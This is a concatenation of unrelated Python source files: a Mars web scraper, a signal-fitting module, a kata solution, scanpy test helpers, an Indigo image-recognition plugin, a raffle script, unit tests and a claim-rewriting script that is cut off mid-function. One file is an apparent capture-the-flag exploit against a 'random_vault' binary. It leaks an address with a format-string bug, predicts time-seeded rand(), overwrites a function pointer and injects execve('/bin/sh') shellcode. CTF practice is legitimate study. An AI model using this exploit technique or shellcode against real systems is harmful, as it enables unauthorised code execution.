# Use Pandas to convert the data to a HTML table string.
def scrape_facts():
url = 'https://galaxyfacts-mars.com'
table_pandas = pd.read_html(url)[0]
table_pandas = table_pandas.iloc[1:]
table_pandas.columns = ['Description', 'Mars', 'Earth']
table_pandas = table_pandas.set_index('Description')
table_pandas = table_pandas.to_html()
return table_pandas
#print(scrape_facts())
# In[ ]:
## Scrape Mars Hemisphere Images
# Step 1 - Get hemisphere titles containing the hemisphere name with Beautiful Soup
""" Step 2 - Get image url string for the full resolution
# hemisphere images using Splinter"""
def scrape_hemispheres():
url = 'https://marshemispheres.com/'
response = requests.get(url)
soup_1 = bs(response.text, 'html')
browser = init_browser()
list_urls = ['https://marshemispheres.com/cerberus.html', 'https://marshemispheres.com/schiaparelli.html',
'https://marshemispheres.com/syrtis.html', 'https://marshemispheres.com/valles.html']
results = soup_1.find_all('h3')
title_list = []
# For loop to get all the headers (hemispheres)
# dropped the 5th element called "Back"
for result in results[:4]:
# Grab the header text
header = result.text
# Remove the word "Enhanced"
header_cleaned = header[:-9]
title_list.append(header_cleaned)
final_urls_list = []
for url in list_urls:
browser.visit(url)
time.sleep(2)
html = browser.html
soup_2 = bs(html, 'html.parser')
links = [a['href'] for a in soup_2.find_all('a', href=True)]
image_url = links[3]
print(image_url)
full_url = url + "/" + image_url
clean_url = url[:28]
final_urls = clean_url + image_url
final_urls_list.append(final_urls)
hemisphere_image_urls = [
{"title": title_list[0], "img_url": final_urls_list[0]},
{"title": title_list[1], "img_url": final_urls_list[1]},
{"title": title_list[2], "img_url": final_urls_list[2]},
{"title": title_list[3], "img_url": final_urls_list[3]}
]
browser.quit()
return(hemisphere_image_urls)
#print(scrape_hemispheres())
# In[ ]:
# Bring everything together into one dictionary
mars_data = {}
def scrape():
news = scrape_news()
featured_image = scrape_image()
facts = scrape_facts()
hemispheres = scrape_hemispheres()
mars_data['news'] = news
mars_data['featured_image'] = featured_image
mars_data['facts'] = facts
mars_data['hemispheres'] = hemispheres
return mars_data
#print(scrape())
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# SPDX-License-Identifier: Apache-2.0
# SPDX-FileCopyrightText: © 2021 Massachusetts Institute of Technology.
# SPDX-FileCopyrightText: © 2021 Lee McCuller <mcculler@mit.edu>
# NOTICE: authors should document their contributions in concisely in NOTICE
# with details inline in source files, comments, and docstrings.
"""
"""
import numpy as np
from wavestate.bunch import Bunch
from ... import TFmath
from ... import representations
from ...utilities import ensure_aid
from ...fitters_ZPK.ZPKrep2MRF import ZP2codings
def resrank_program(
fitter,
rank_zp_idx_list,
name,
program,
variant=None,
marginalize_delay=True,
**kwargs
):
Pc = fitter.poles.c
Zc = fitter.zeros.c
Pr = fitter.poles.r
Zr = fitter.zeros.r
Pc_mod = []
Pr_mod = []
Zc_mod = []
Zr_mod = []
program_copy = list(program)
while program_copy:
arg = program_copy.pop()
which = program_copy.pop()
if which == "PcDelIdx":
Pc_mod.append(Pc[arg])
elif which == "ZcDelIdx":
Zc_mod.append(Zc[arg])
elif which == "PrDelIdx":
Pr_mod.append(Pr[arg])
elif which == "ZrDelIdx":
Zr_mod.append(Zr[arg])
# swap on these since they are added
elif which == "PrAdd":
Zr_mod.append(arg)
elif which == "ZrAdd":
Pr_mod.append(arg)
elif which == "PcAdd":
Zc_mod.append(arg)
elif which == "ZcAdd":
Pc_mod.append(arg)
PrB = representations.asMRRB(c=Pc_mod, r=Pr_mod)
ZrB = representations.asMRRB(c=Zc_mod, r=Zr_mod)
h, lnG = PrB.val_lnG(fitter.F_Hz)
h, lnG = ZrB.val_lnG(fitter.F_Hz, h=1 / h, lnG=-lnG)
R = fitter.xfer_fit / (fitter.data * h)
# this is the exact solution for the gain adjustment required, using the DualB
# residuals
G = (
np.sum(fitter.W ** 2 / TFmath.abs_sq(R))
/ np.sum(fitter.W ** 2 * TFmath.abs_sq(R))
) ** 0.25
R = G * R
rank = np.sum(TFmath.abs_sq(fitter.residuals_NLmap(R, W=fitter.W)))
if marginalize_delay:
# linear detrends the phasing term to remove delay effects
f = fitter.F_Hz
# the factor of 2 is not with the exact solution, but seems to work better
R.imag -= (
f * np.sum(f * R.imag * fitter.W ** 2) / np.sum(f ** 2 * fitter.W ** 2) / 2
)
rank_moddelay = np.sum(TFmath.abs_sq(fitter.residuals_NLmap(R, W=fitter.W)))
rank = min(rank, rank_moddelay)
pbunch = Bunch(**kwargs)
pbunch.rank = rank
pbunch.name = name
pbunch.variant = variant
pbunch.program = program
rank_zp_idx_list.append(pbunch)
return pbunch
def ranking_reduction_trials(
aid,
rank_zp_idx_list,
num_total_max=4,
num_type_max=2,
num_try2=2,
ranking_factor_max=None,
greedy=False,
return_remaining=False,
reset_delay=True,
):
aid = ensure_aid(aid)
if not rank_zp_idx_list:
if return_remaining:
return [], rank_zp_idx_list
else:
return []
type_count = dict()
num_total = 0
idx_total = 0
trials = []
trials_try1 = []
trials_try2 = []
ranks_original = []
minranking = float("inf")
aid.log_progress(6, "trials started")
for pbunch in rank_zp_idx_list:
idx_total += 1
if ranking_factor_max is not None and (
pbunch.rank > minranking * ranking_factor_max
):
continue
if pbunch.rank < minranking:
minranking = pbunch.rank
count = type_count.get(pbunch.name, 0) + 1
if num_type_max is not None and count > num_type_max:
continue
type_count[pbunch.name] = count
num_total += 1
if num_total_max is not None and num_total > num_total_max:
break
ranks_original.append(pbunch.rank)
Pc_mod = list(aid.fitter.poles.c)
Zc_mod = list(aid.fitter.zeros.c)
Pr_mod = list(aid.fitter.poles.r)
Zr_mod = list(aid.fitter.zeros.r)
Pc_idx_remove = set()
Zc_idx_remove = set()
Pr_idx_remove = set()
Zr_idx_remove = set()
Pc_new = []
Zc_new = []
Pr_new = []
Zr_new = []
# work backward on the command sequence removing the idxs
trial = Bunch()
trial.prog_redux = []
trial.ord_ch = 0
trial.pbunch = pbunch
program = list(pbunch.program)
while program:
arg = program.pop()
which = program.pop()
trial.prog_redux.append(which)
if which == "PcDelIdx":
trial.prog_redux.append(Pc_mod[arg])
trial.ord_ch -= 2
Pc_idx_remove.add(arg)
elif which == "ZcDelIdx":
trial.prog_redux.append(Zc_mod[arg])
trial.ord_ch -= 2
Zc_idx_remove.add(arg)
elif which == "PrDelIdx":
trial.prog_redux.append(Pr_mod[arg])
trial.ord_ch -= 1
Pr_idx_remove.add(arg)
elif which == "ZrDelIdx":
trial.prog_redux.append(Zr_mod[arg])
trial.ord_ch -= 1
Zr_idx_remove.add(arg)
elif which == "PrAdd":
trial.prog_redux.append(arg)
trial.ord_ch += 1
Pr_new.append(arg)
elif which == "ZrAdd":
trial.prog_redux.append(arg)
trial.ord_ch += 1
Zr_new.append(arg)
elif which == "PcAdd":
trial.prog_redux.append(arg)
trial.ord_ch += 2
Pc_new.append(arg)
elif which == "ZcAdd":
trial.prog_redux.append(arg)
trial.ord_ch += 2
Zc_new.append(arg)
for idx in reversed(sorted(Pc_idx_remove)):
del Pc_mod[idx]
for idx in reversed(sorted(Zc_idx_remove)):
del Zc_mod[idx]
for idx in reversed(sorted(Pr_idx_remove)):
del Pr_mod[idx]
for idx in reversed(sorted(Zr_idx_remove)):
del Zr_mod[idx]
if trial.ord_ch == 0:
trial.ord_str = "OrdC"
elif trial.ord_ch < 0:
trial.ord_str = "OrdDn"
else:
trial.ord_str = "OrdUp"
coding_map, num_codings_mod, den_codings_mod = ZP2codings(
aid.fitter,
zeros=representations.asMRRB(r=Zr_mod, c=Zc_mod),
poles=representations.asMRRB(r=Pr_mod, c=Pc_mod),
)
coding_map, num_codings_new, den_codings_new = ZP2codings(
aid.fitter,
zeros=representations.asMRRB(r=Zr_new, c=Zc_new),
poles=representations.asMRRB(r=Pr_new, c=Pc_new),
coding_map=coding_map,
)
fitter = coding_map.mrf_default(
parent=aid.fitter,
num_codings=num_codings_mod + num_codings_new,
den_codings=den_codings_mod + den_codings_new,
)
trial.fitter = fitter
trial.codings_mod = num_codings_mod + den_codings_new
trial.codings_new = num_codings_mod + den_codings_new
trial.rank_original = pbunch.rank
trials_try1.append(trial)
def trial_optimize(trial):
improved = False
fitter = trial.fitter
try:
with fitter.with_codings_only([fitter.gain_coding]):
fitter.optimize()
except Exception as e:
aid.log_debug(9, "Optimize Exception", e)
try:
# anneal by moving the original codings first
if trial.codings_new:
with fitter.with_codings_only(trial.codings_mod):
fitter.optimize()
if reset_delay:
aid.fitter.delay_s = aid.hint("delay_s")
fitter.optimize()
except Exception as e:
aid.log_debug(9, "Optimize Exception", e)
trial.improved = False
return trial
if pbunch.variant is not None:
ord_str = pbunch.variant
else:
ord_str = trial.ord_str
improved = aid.fitter_check(
fitter,
variant=ord_str,
update=False,
validate=False,
)
trial.improved = improved
return trial
mt = aid.hint("multithreading", None)
if mt is not None and mt > 1:
import multiprocessing.pool
pool = multiprocessing.pool.ThreadPool(
processes=mt,
)
trial_map = pool.imap_unordered
else:
trial_map = map
improved = False
for trial in trial_map(trial_optimize, trials_try1):
aid.log(8, "Reducing Program", pbunch.rank, trial.prog_redux)
if not trial.improved:
trials_try2.append(trial)
else:
improved = True
trials_try2.append(trial)
trials.append(trial)
if greedy and trial.improved:
break
aid.log_progress(7, "trials annealing")
def trial_optimize_anneal(trial):
fitter = trial.fitter
# TODO fix
from . import algorithms
if not algorithms.optimize_anneal(aid, fitter):
return trial
improved = aid.fitter_check(
fitter,
variant=trial.ord_str,
update=False,
validate=False,
)
trial.improved = improved
return trial
if not (greedy and improved):
trials_try2.sort(key=lambda trial: trial.fitter.residuals_average)
for trial in trial_map(trial_optimize_anneal, trials_try2[:num_try2]):
if greedy and trial.improved:
break
trials.sort(key=lambda trial: trial.fitter.residuals_average)
if not return_remaining:
return trials
else:
return trials, rank_zp_idx_list[idx_total:]
|
'''
Problem description:
Welcome.
In this kata you are required to, given a string, replace every letter with its position in the alphabet.
If anything in the text isn't a letter, ignore it and don't return it.
"a" = 1, "b" = 2, etc.
Example
alphabet_position("The sunset sets at twelve o' clock.")
Should return "20 8 5 19 21 14 19 5 20 19 5 20 19 1 20 20 23 5 12 22 5 15 3 12 15 3 11" (as a string)
'''
def alphabet_position(text):
alphabet = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
"k", "l", "m", "n", "o", "p", "q", "r", "s", "t", "u", "v",
"w", "x", "y", "z"]
out = []
new=[]
for l in text:
if l.isalpha():
new.append(l.lower())
for l in new:
out.append(str(alphabet.index(l)+1))
new.clear()
new = " ".join(out)
return new |
"""
This file contains helper functions for the scanpy test suite.
"""
from itertools import permutations
import scanpy as sc
import numpy as np
import warnings
import pytest
from anndata.tests.helpers import asarray, assert_equal
from scanpy.tests._data._cached_datasets import pbmc3k
# TODO: Report more context on the fields being compared on error
# TODO: Allow specifying paths to ignore on comparison
###########################
# Representation choice
###########################
# These functions can be used to check that functions are correctly using arugments like `layers`, `obsm`, etc.
def check_rep_mutation(func, X, *, fields=["layer", "obsm"], **kwargs):
"""Check that only the array meant to be modified is modified."""
adata = sc.AnnData(X=X.copy(), dtype=X.dtype)
for field in fields:
sc.get._set_obs_rep(adata, X, **{field: field})
X_array = asarray(X)
adata_X = func(adata, copy=True, **kwargs)
adatas_proc = {
field: func(adata, copy=True, **{field: field}, **kwargs) for field in fields
}
# Modified fields
for field in fields:
result_array = asarray(
sc.get._get_obs_rep(adatas_proc[field], **{field: field})
)
np.testing.assert_array_equal(asarray(adata_X.X), result_array)
# Unmodified fields
for field in fields:
np.testing.assert_array_equal(X_array, asarray(adatas_proc[field].X))
np.testing.assert_array_equal(
X_array, asarray(sc.get._get_obs_rep(adata_X, **{field: field}))
)
for field_a, field_b in permutations(fields, 2):
result_array = asarray(
sc.get._get_obs_rep(adatas_proc[field_a], **{field_b: field_b})
)
np.testing.assert_array_equal(X_array, result_array)
def check_rep_results(func, X, *, fields=["layer", "obsm"], **kwargs):
"""Checks that the results of a computation add values/ mutate the anndata object in a consistent way."""
# Gen data
empty_X = np.zeros(shape=X.shape, dtype=X.dtype)
adata = sc.AnnData(
X=empty_X.copy(),
layers={"layer": empty_X.copy()},
obsm={"obsm": empty_X.copy()},
)
adata_X = adata.copy()
adata_X.X = X.copy()
adatas_proc = {}
for field in fields:
cur = adata.copy()
sc.get._set_obs_rep(cur, X.copy(), **{field: field})
adatas_proc[field] = cur
# Apply function
func(adata_X, **kwargs)
for field in fields:
func(adatas_proc[field], **{field: field}, **kwargs)
# Reset X
adata_X.X = empty_X.copy()
for field in fields:
sc.get._set_obs_rep(adatas_proc[field], empty_X.copy(), **{field: field})
for field_a, field_b in permutations(fields, 2):
assert_equal(adatas_proc[field_a], adatas_proc[field_b])
for field in fields:
assert_equal(adata_X, adatas_proc[field])
def _prepare_pbmc_testdata(sparsity_func, dtype, small=False):
"""Prepares 3k PBMC dataset with batch key `batch` and defined datatype/sparsity.
Params
------
sparsity_func
sparsity function applied to adata.X (e.g. csr_matrix.toarray for dense or csr_matrix for sparse)
dtype
numpy dtype applied to adata.X (e.g. 'float32' or 'int64')
small
False (default) returns full data, True returns small subset of the data."""
adata = pbmc3k().copy()
if small:
adata = adata[:1000, :500]
sc.pp.filter_cells(adata, min_genes=1)
np.random.seed(42)
adata.obs['batch'] = np.random.randint(0, 3, size=adata.shape[0])
sc.pp.filter_genes(adata, min_cells=1)
adata.X = sparsity_func(adata.X.astype(dtype))
return adata
def _check_check_values_warnings(function, adata, expected_warning, kwargs={}):
'''Runs `function` on `adata` with provided arguments `kwargs` twice: once with `check_values=True` and once with `check_values=False`. Checks that the `expected_warning` is only raised whtn `check_values=True`.'''
# expecting 0 no-int warnings
with warnings.catch_warnings(record=True) as record:
function(adata.copy(), **kwargs, check_values=False)
warning_msgs = [w.message.args[0] for w in record]
assert expected_warning not in warning_msgs
# expecting 1 no-int warning
with warnings.catch_warnings(record=True) as record:
function(adata.copy(), **kwargs, check_values=True)
warning_msgs = [w.message.args[0] for w in record]
assert expected_warning in warning_msgs
|
#! /usr/bin/env python
####################
import indigo
import os
import sys
import datetime
import time
import json
import copy
from copy import deepcopy
import requests
from ImageProcessingAdapter import ImageProcessingOptions
from GoogleVisionAdapter import GoogleImageProcessingAdapter
from AWSRekognitionAdapter import AWSImageProcessingAdapter
from distutils.version import LooseVersion
DEFAULT_UPDATE_FREQUENCY = 24 # frequency of update check
emptyEVENT = {
"eventType": "OCR",
"OCR" : "",
"label" : "",
"logo" : "",
"notLabel": "0",
"labelScore" : ".9",
"logoScore" : ".9",
"faceScore" : ".9",
"noFace" : "0",
"enableDisable" : "0"
}
################################################################################
class Plugin(indigo.PluginBase):
########################################
def __init__(self, pluginId, pluginDisplayName, pluginVersion, pluginPrefs):
super(Plugin, self).__init__(pluginId, pluginDisplayName, pluginVersion, pluginPrefs)
self.debug = pluginPrefs.get("chkDebug", False)
self.lastUpdateCheck = None
self.pollingInterval = 60
self.configServices(pluginPrefs)
self.currentEventN = "0"
if "EVENTS" in self.pluginPrefs:
self.EVENTS = json.loads(self.pluginPrefs["EVENTS"])
else:
self.EVENTS = {}
########################################
def startup(self):
self.debugLog(u"startup called")
self.version_check()
def checkForUpdates(self):
self.version_check()
def version_check(self):
pluginId = self.pluginId
self.lastUpdateCheck = datetime.datetime.now()
# Create some URLs we'll use later on
current_version_url = "https://api.indigodomo.com/api/v2/pluginstore/plugin-version-info.json?pluginId={}".format(pluginId)
store_detail_url = "https://www.indigodomo.com/pluginstore/{}/"
try:
# GET the url from the servers with a short timeout (avoids hanging the plugin)
reply = requests.get(current_version_url, timeout=5)
# This will raise an exception if the server returned an error
reply.raise_for_status()
# We now have a good reply so we get the json
reply_dict = reply.json()
plugin_dict = reply_dict["plugins"][0]
# Make sure that the 'latestRelease' element is a dict (could be a string for built-in plugins).
latest_release = plugin_dict["latestRelease"]
if isinstance(latest_release, dict):
# Compare the current version with the one returned in the reply dict
if LooseVersion(latest_release["number"]) > LooseVersion(self.pluginVersion):
# The release in the store is newer than the current version.
# We'll do a couple of things: first, we'll just log it
self.logger.info(
"A new version of the plugin (v{}) is available at: {}".format(
latest_release["number"],
store_detail_url.format(plugin_dict["id"])
)
)
except Exception as exc:
self.logger.error(unicode(exc))
def runConcurrentThread(self):
self.logger.debug("Starting concurrent tread")
self.sleep(1)
try:
while True:
self.sleep(int(DEFAULT_UPDATE_FREQUENCY + 1))
if self.lastUpdateCheck < datetime.datetime.now()-datetime.timedelta(hours=DEFAULT_UPDATE_FREQUENCY):
self.version_check()
except self.StopThread:
self.logger.debug("Received StopThread")
def shutdown(self):
self.pluginPrefs["EVENTS"] = json.dumps(self.EVENTS)
self.debugLog(u"shutdown called")
def deviceStartComm(self, dev):
self.debugLog(u"deviceStartComm: %s" % (dev.name,))
########################################
def validateDeviceConfigUi(self, valuesDict, typeId, devId):
return (True, valuesDict)
def updateConfig(self, valuesDict):
return valuesDict
def closedPrefsConfigUi(self, valuesDict, userCancelled):
if not userCancelled:
self.configServices(valuesDict)
self.debug = valuesDict["chkDebug"]
def configServices(self, pluginPrefs):
self.imageProcessors = []
APIKey = pluginPrefs.get("GoogleAPIKey", None)
if APIKey is not None:
self.imageProcessors.append(GoogleImageProcessingAdapter(self.logger, [APIKey]))
APIKey = pluginPrefs.get("AWSAPIKey", None)
APIKey2 = pluginPrefs.get("AWSSecretAPIKey", None)
if APIKey is not None:
self.imageProcessors.append(AWSImageProcessingAdapter(self.logger, [APIKey, APIKey2]))
def eventConfigCallback(self, valuesDict,typeId=""):
self.currentEventN=str(valuesDict["selectEvent"])
if self.currentEventN =="0":
errorDict = valuesDict
return valuesDict
if not self.currentEventN in self.EVENTS:
self.EVENTS[self.currentEventN]= copy.deepcopy(emptyEVENT)
valuesDict["eventType"] = str(self.EVENTS[self.currentEventN]["eventType"])
valuesDict["OCR"] = str(self.EVENTS[self.currentEventN]["OCR"])
valuesDict["label"] = str(self.EVENTS[self.currentEventN]["label"])
valuesDict["logo"] = str(self.EVENTS[self.currentEventN]["logo"])
valuesDict["notLabel"] = str(self.EVENTS[self.currentEventN]["notLabel"])
valuesDict["labelScore"] = str(self.EVENTS[self.currentEventN]["labelScore"])
valuesDict["faceScore"] = str(self.EVENTS[self.currentEventN]["faceScore"])
valuesDict["logoScore"] = str(self.EVENTS[self.currentEventN]["logoScore"])
valuesDict["noFace"] = self.EVENTS[self.currentEventN]["noFace"]
valuesDict["enableDisable"] = self.EVENTS[self.currentEventN]["enableDisable"]
self.updatePrefs =True
return valuesDict
def getMenuActionConfigUiValues(self, menuId):
#indigo.server.log(u'Called getMenuActionConfigUiValues(self, menuId):')
#indigo.server.log(u' (' + unicode(menuId) + u')')
valuesDict = indigo.Dict()
valuesDict["selectEvent"] = "0"
valuesDict["eventType"] = "0"
valuesDict["enableDisable"] = "0"
errorMsgDict = indigo.Dict()
return (valuesDict, errorMsgDict)
def sendImageAction(self, pluginAction, dev):
result = None
processOCR = False
processFace = False
processLabel = False
processLogo = False
for i in self.EVENTS:
evnt = self.EVENTS[i]
if pluginAction.props["event" + str(i)]:
if evnt["eventType"] == "OCR":
processOCR = True
if evnt["eventType"] == "Face":
processFace = True
if evnt["eventType"] == "Label":
processLabel = True
if evnt["eventType"] == "Logo":
processLogo = True
if not (processOCR or processLabel or processLogo or processFace):
self.logger.error("No configured events for this action")
return
options = ImageProcessingOptions(processOCR, processFace, processLabel, processLogo)
image = None
if pluginAction.props["locationOption"] == "static":
image = pluginAction.props["location"]
else:
image = indigo.variables[int(pluginAction.props["locationVariable"])].value
### SEND TO GOOGLE
if pluginAction.pluginTypeId == "sendImageGoogle":
imageProcessor = None
for processor in self.imageProcessors:
if isinstance(processor, GoogleImageProcessingAdapter):
imageProcessor = processor
if imageProcessor == None:
indigo.server.log("Not properly configured for Google Vision API")
return
indigo.server.log("sending " + image + " to Google Vision API")
result = imageProcessor.sendImage(image, options)
### SEND TO AWS
elif pluginAction.pluginTypeId == "sendImageAWS":
imageProcessor = None
for processor in self.imageProcessors:
if isinstance(processor, AWSImageProcessingAdapter):
imageProcessor = processor
if imageProcessor == None:
indigo.server.log("Not properly configured for AWS Rekognition API")
return
indigo.server.log("sending " + image + " to AWS Rekognition API")
result = imageProcessor.sendImage(image, options)
if result is None:
self.logger.error("Returned no results")
return
### PROCESS RESULTS
buildstr = ""
facecounter = 0
resultsFound = False
## OUTPUT TO INDIGO
if len(result.Label_Results) > 0:
resultsFound = True
for lbl in result.Label_Results:
buildstr += lbl.description + " (score:" + str(lbl.confidence) +"), "
indigo.server.log("Label Results: " + buildstr[:-2])
buildstr = ""
if len(result.OCR_Results) > 0:
resultsFound = True
for ocr in result.OCR_Results:
buildstr += ocr.description.replace('\n','') + " (language:" + ocr.other + "), "
indigo.server.log("OCR Results: " + buildstr[:-2])
buildstr = ""
if len(result.Face_Results) > 0:
resultsFound = True
for face in result.Face_Results:
facecounter += 1
buildstr += "Face " + str(facecounter) + " with confidence of " + str(face.Confidence) + ". "
buildstr = "Found a total of " + str(facecounter) + " face(s). " + buildstr
indigo.server.log("Face Results: " + buildstr[:-2])
buildstr = ""
if len(result.Logo_Results) > 0:
resultsFound = True
for logo in result.Logo_Results:
buildstr += logo.description + " (score:" + str(logo.confidence) + ", language: " + logo.other + "), "
indigo.server.log("Logo Results: " + buildstr[:-2])
buildstr = ""
if not resultsFound:
indigo.server.log("No results found in image.")
for trigger in indigo.triggers.iter("self"):
eventID = trigger.pluginTypeId[5:].strip()
# self.logger.debug("size of self.EVENTS: " + str(len(self.EVENTS)) + " , eventID: " + eventID)
if int(eventID) <= len(self.EVENTS):
eventType = self.EVENTS[eventID]["eventType"]
else:
self.logger.error("Trigger '" + trigger.name + "'' is configured for a disabled Google Vision event, skipping...")
continue
if not self.EVENTS[eventID]["enableDisable"]:
self.logger.error("Trigger '" + trigger.name + "'' is configured for a disabled Google Vision event, skipping...")
continue
if not pluginAction.props["event" + eventID]:
self.logger.debug("Trigger '" + trigger.name + "' is not applicable for event " + eventID + ", skipping...")
continue
self.logger.debug("Evaluating trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
if eventType == "OCR":
ocrSearch = self.EVENTS[eventID]["OCR"]
if len(result.OCR_Results) > 0:
for ocr in result.OCR_Results:
if ocrSearch.lower() in ocr.description.lower():
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
break
elif eventType == "Face":
if facecounter == 0 and self.EVENTS[eventID]["noFace"]:
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
elif facecounter == 0:
continue
else:
for face in result.Face_Results:
if face.detectionConfidence >= float(self.EVENTS[eventID]["faceScore"]):
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
break
elif eventType == "Label":
foundLabel = False
if len(result.Label_Results) > 0:
for lbl in result.Label_Results:
if len(self.EVENTS[eventID]["label"]) > 0:
for lblSearch in self.EVENTS[eventID]["label"].replace(" ", "").split(","):
if lblSearch.lower() == lbl.description.lower() and lbl.confidence >= float(self.EVENTS[eventID]["labelScore"]):
self.logger.debug("Trigger '" + trigger.name + "' Found label of interest: " + lblSearch)
foundLabel = True
if (foundLabel and not self.EVENTS[eventID]["notLabel"]) or (not foundLabel and self.EVENTS[eventID]["notLabel"]):
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
elif eventType == "Logo":
foundLogo = False
self.logger.debug("Looking for logos: " + self.EVENTS[eventID]["txtLogo"])
if len(result.Logo_Results) > 0:
for logo in result.Logo_Results:
if len(self.EVENTS[eventID]["logo"]) > 0:
for logoSearch in self.EVENTS[eventID]["logo"].replace(" ", "").split(","):
if logoSearch.lower() == logo.description.lower() and logo.confidence >= float(self.EVENTS[eventID]["logoScore"]):
self.logger.debug("Found logo of interest: " + logoSearch)
foundLogo = True
if foundLogo:
self.logger.debug("Executing trigger '" + trigger.name + "' (eventID: " + eventID + ", eventType: " + eventType + ")")
indigo.trigger.execute(trigger)
########################################
def buttonConfirmDevicesCALLBACK(self, valuesDict,typeId=""):
errorDict=indigo.Dict()
self.currentEventN=str(valuesDict["selectEvent"])
if self.currentEventN == "0" or self.currentEventN =="":
return valuesDict
if not self.currentEventN in self.EVENTS:
self.EVENTS[self.currentEventN] = copy.deepcopy(emptyEVENT)
if valuesDict["DeleteEvent"]:
valuesDict["DeleteEvent"] = False
valuesDict["eventType"] = "OCR"
valuesDict["OCR"] = ""
valuesDict["label"] = ""
valuesDict["logo"] = ""
valuesDict["notLabel"] = False
valuesDict["labelScore"] = .90
valuesDict["logoScore"] = .90
valuesDict["faceScore"] = .90
valuesDict["enableDisable"] = False
valuesDict["noFace"] = False
self.EVENTS[self.currentEventN] = copy.deepcopy(emptyEVENT)
self.currentEventN ="0"
valuesDict["selectEvent"] ="0"
valuesDict["EVENT"] =json.dumps(self.EVENTS)
return valuesDict
##### not delete
if valuesDict["enableDisable"] != "": self.EVENTS[self.currentEventN]["enableDisable"] = valuesDict["enableDisable"]
else: self.EVENTS[self.currentEventN]["enableDisable"] = emptyEVENT["enableDisable"]; valuesDict["enableDisable"] = emptyEVENT["enableDisable"];errorDict["enableDisable"]=emptyEVENT["enableDisable"]
self.EVENTS[self.currentEventN]["eventType"] = valuesDict["eventType"]
self.EVENTS[self.currentEventN]["OCR"] = valuesDict["OCR"]
self.EVENTS[self.currentEventN]["label"] = valuesDict["label"]
self.EVENTS[self.currentEventN]["logo"] = valuesDict["logo"]
self.EVENTS[self.currentEventN]["notLabel"] = valuesDict["notLabel"]
self.EVENTS[self.currentEventN]["labelScore"] = valuesDict["labelScore"]
self.EVENTS[self.currentEventN]["logoScore"] = valuesDict["logoScore"]
self.EVENTS[self.currentEventN]["faceScore"] = valuesDict["faceScore"]
self.EVENTS[self.currentEventN]["noFace"] = valuesDict["noFace"]
self.EVENTS[self.currentEventN]["enableDisable"] = valuesDict["enableDisable"]
valuesDict["EVENTS"] = json.dumps(self.EVENTS)
if len(errorDict) > 0: return valuesDict, errorDict
return valuesDict
|
import csv
import sys
from random import choice
with open(sys.argv[1], 'r', newline='') as file:
temp_csv = csv.reader(file)
contestant_list = [line for line in temp_csv]
winner = choice(contestant_list)
contestant_list.remove(winner)
with open(sys.argv[1], 'w', newline='') as outfile:
writer = csv.writer(outfile, delimiter=',')
for line in contestant_list:
writer.writerow(line)
print(winner[0])
|
from ptrlib import *
import ctypes
glibc = ctypes.cdll.LoadLibrary('/lib/x86_64-linux-gnu/libc-2.27.so')
sock = Process("./random_vault")
# leak proc
sock.sendlineafter(": ", "%11$p")
sock.recvuntil("Hello, ")
proc_base = int(sock.recvline(), 16) - 0x1750
logger.info("proc = " + hex(proc_base))
# set seed
sock.sendlineafter("Quit\n", "3")
glibc.srand(glibc.time(0))
offset = [(glibc.rand() & 0xff) * 8 for i in range(7)]
# overwrite function pointer
payload = fsb(
pos = 24,
writes = {proc_base + 0x5000: proc_base + 0x5010 + offset[0]},
written = 0,
bs = 2,
null = False,
bits = 64
)
sock.sendlineafter("Quit\n", "1")
sock.sendlineafter(": ", payload)
sock.recvuntil("Actions:")
# write shellcode
x = offset[1] - offset[0] - 8
sc1 = u64(b"\x48\x89\xd6\xe9" + p32(x if x > 0 else (0xffffffff ^ (-x)) + 1))
sc2 = u64(b"\x31\xd2\xb6\xff\x31\xff\x0f\x05")
sock.sendlineafter("Quit\n", "2")
sock.sendlineafter(": ", str(sc1))
sock.sendlineafter(": ", str(sc2))
for i in range(5):
sock.sendlineafter(": ", str(0))
# send second shellcode
shellcode = b'\x90' * (offset[1] + 8)
shellcode += b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'
sock.recvline()
sock.recvline()
sock.send(shellcode)
sock.interactive()
|
import unittest
from utils import is_square
class TestIsSquare(unittest.TestCase):
def test_is_square(self):
self.assertTrue(is_square(1))
self.assertFalse(is_square(2))
self.assertFalse(is_square(3))
self.assertTrue(is_square(4))
self.assertFalse(is_square(6))
self.assertFalse(is_square(7))
self.assertFalse(is_square(8))
self.assertTrue(is_square(9))
self.assertTrue(is_square(81))
if __name__ == '__main__':
unittest.main()
|
import json
import os
import re
import spacy
from argparse import ArgumentParser
from copy import deepcopy
from tqdm import tqdm
parser = ArgumentParser()
parser.add_argument("--in-file",type=str)
parser.add_argument("--out-dir",type=str)
args = parser.parse_args()
nlp = spacy.load('en_core_web_sm')
if not os.path.exists(args.out_dir):
os.makedirs(args.out_dir)
class ReplacementRule:
def process_instance(self, instance):
return self._process(instance)
def _process(self, instance):
raise NotImplementedError("Not implemented here")
def name(self):
raise NotImplementedError("NotImplemented")
class IsAReplacementRule1(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) is a (.+)", instance["claim"])
matches2 = re.match(r"(.+) is an (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None and matches2 is None:
return None
if matches1 is not None:
new_claim = "There does not exist a {0} called {1}.".format(matches1.group(2).replace(".",""),matches1.group(1))
else:
new_claim = "There does not exist an {0} called {1}.".format(matches2.group(2).replace(".", ""), matches2.group(1))
instance["claim"] = new_claim
instance["label"] = "REFUTES" if instance["label"] == "SUPPORTS" else "SUPPORTS"
return instance
def name(self):
return "there.does.not.exist.a.called"
class IsAReplacementRule2(ReplacementRule):
def _process(self, instance):
matches1 = re.match(r"(.+) is (?:a|an) (.+)", instance["claim"])
if instance["label"] == "NOT ENOUGH INFO":
return None
if matches1 is None:
return None
